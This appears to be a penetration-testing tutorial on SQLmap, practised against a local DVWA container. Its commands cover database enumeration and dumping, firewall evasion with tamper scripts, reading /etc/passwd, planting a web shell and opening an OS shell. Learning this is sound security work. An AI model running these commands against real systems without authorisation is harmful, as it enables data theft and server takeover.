SQL injection remains one of the most prevalent and impactful web application vulnerabilities. SQLmap automates the detection and exploitation of SQL injection flaws with a level of sophistication that would take hours to replicate manually. Used correctly against authorised targets, it’s indispensable. Used carelessly, it can destroy a production database. This guide covers SQLmap comprehensively, using DVWA (Damn Vulnerable Web Application) as a safe practice target.
Setting Up a Practice Environment
docker run -d -p 8080:80 vulnerables/web-dvwa
# Access: http://localhost:8080 - admin/password
# Set Security Level to "Low" for initial practice
Basic Usage
# Test a URL parameter for SQL injection
sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
# Use --batch to answer prompts with defaults
sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --batch
Providing Authentication Cookies
sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=your_session_id; security=low"
--batch
Using Saved Burp Suite Requests
The most reliable approach – intercept in Burp, save request to file, feed to SQLmap:
sqlmap -r /tmp/request.txt --batch
Database Enumeration
# List all databases
sqlmap -u "..." --cookie="..." --batch --dbs
# List tables in a database
sqlmap -u "..." --cookie="..." --batch -D dvwa --tables
# List columns
sqlmap -u "..." --cookie="..." --batch -D dvwa -T users --columns
# Dump data
sqlmap -u "..." --cookie="..." --batch -D dvwa -T users --dump
Useful Fingerprinting
sqlmap -u "..." --cookie="..." --batch --current-user
sqlmap -u "..." --cookie="..." --batch --current-db
sqlmap -u "..." --cookie="..." --batch --is-dba
sqlmap -u "..." --cookie="..." --batch --hostname
Blind Injection Techniques
# Force time-based blind technique
sqlmap -u "..." --technique=T --batch
# Set time delay (default 5 seconds)
sqlmap -u "..." --time-sec=5 --batch
# All techniques (default)
sqlmap -u "..." --technique=BEUSTQ --batch
WAF Evasion with Tamper Scripts
# List available tamper scripts
sqlmap --list-tampers
# Common tampers:
# space2comment - replaces spaces with /**/
# randomcase - randomises character case
# base64encode - base64 encodes the payload
sqlmap -u "..." --tamper=space2comment,randomcase --batch
Risk and Level Settings
# --level (1-5): how many tests to run
# --risk (1-3): risk of tests (3 includes OR-based payloads that can modify data)
# More thorough
sqlmap -u "..." --level=5 --risk=2 --batch
# Conservative for production-adjacent testing
sqlmap -u "..." --level=2 --risk=1 --batch
OS-Level Access
# Read a file (requires FILE privilege)
sqlmap -u "..." --cookie="..." --batch --file-read="/etc/passwd"
# Write a file
sqlmap -u "..." --cookie="..." --batch
--file-write="/home/kali/shell.php"
--file-dest="/var/www/html/shell.php"
# Interactive OS shell
sqlmap -u "..." --cookie="..." --batch --os-shell
Resuming Sessions
sqlmap -u "..." --cookie="..." --batch --resume
sqlmap -u "..." --cookie="..." --batch --output-dir=/tmp/sqlmap_results
Conclusion
SQLmap automates what would otherwise be hours of tedious manual injection testing. Its value on a real engagement is in comprehensively covering injection vectors you might miss manually, and in extracting data systematically once injection is confirmed. The discipline is in using it responsibly – low risk settings, proper scope control, and never running dump commands against a production database without understanding the impact.
Only use SQLmap against applications you own or have explicit written authorisation to test. Data exfiltration from unauthorised databases is a serious criminal offence.

Leave a Reply
You must be logged in to post a comment.